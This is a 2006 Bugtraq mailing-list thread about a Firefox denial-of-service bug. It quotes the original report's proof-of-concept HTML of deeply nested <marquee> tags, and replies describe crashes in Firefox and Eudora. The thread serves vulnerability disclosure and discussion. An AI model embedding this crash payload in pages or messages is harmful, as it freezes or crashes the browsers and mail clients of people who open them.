Bugtraq mailing list archives
RE: Fire fox dos exploit
From: Sanjay Rawat <sanjayr () intoto com>
Date: Mon, 05 Jun 2006 09:19:20 +0530
I have seen that the exploit also freezes Eudora 6.2.1.2. I was trying to open the original mail in Eudora mail client and whenever I clicked on the the mail , Eudora stopped responding anymore. I had to restart the application.
regards -Sanjay Rawat At 09:52 PM 5/31/2006, Andy wrote:
Crashed my FF 1.5.0.3 straight away on a fully patched XP Pro Service Pack 2 Andy -----Original Message----- From: Josh Zlatin-Amishav [mailto:josh () tkos co il] Sent: 31 May 2006 16:50 To: co296 () aol com Cc: bugtraq () securityfocus com Subject: Re: Fire fox dos exploit On Tue, 30 May 2006, co296 () aol com wrote: > I have found a problem which causes denial of service on fire fox browser Can you give us some more details, like versions and platforms affected? I was unable to recreate this flaw using firefox 1.5.dfsg+1.5.0 on Debian unstable. -- - Josh > > Creadit:to n00b for finding this bug.. > > the problem lie's in the > > <marquee> html tag uses 100% cpu and crash's the browser.. > > Following proof of concept available > > <html> > <head> > <title>Credit to n00b..</title> > <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> > </head> > > <body> > <marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><mar quee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee ><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><ma rquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marque e><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><m arquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marqu ee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>< marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marq uee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></ marquee></marquee></marquee></marquee></marquee></marquee></marquee></marque e></marquee></marquee></marquee></marquee></marquee></marquee></marquee></ma rquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee> </marquee></marquee></marquee></marquee></marquee></marquee></marquee></marq ue > e></marquee></marquee></marquee></marquee></marquee></marquee></marquee></ma rquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee> </marquee></marquee></marquee></marquee></marquee></marquee></marquee></marq uee></marquee></marquee></marquee></marquee></marquee></marquee></marquee> > </body> > </html> > >
Current thread:
- Re: Fire fox dos exploit pagvac (Jun 04)
- <Possible follow-ups>
- RE: Fire fox dos exploit Andy (Jun 04)
- RE: Fire fox dos exploit Sanjay Rawat (Jun 05)
- RE: Fire fox dos exploit Jaroslaw Sajko (Jun 07)
- RE: Fire fox dos exploit Sanjay Rawat (Jun 05)
- Re: Fire fox dos exploit Ronald van den Blink (Jun 04)
- Re: Fire fox dos exploit Yannick von Arx (Jun 04)
- Re: Re: Fire fox dos exploit vincenzo . ampolo (Jun 04)
- Re: Fire fox dos exploit Phil Trainor (Jun 04)
- Re: Fire fox dos exploit Ronald van den Blink (Jun 04)
- Re: Fire fox dos exploit Aaron Hopkins (Jun 04)
- Re: Re: Fire fox dos exploit al4321 (Jun 07)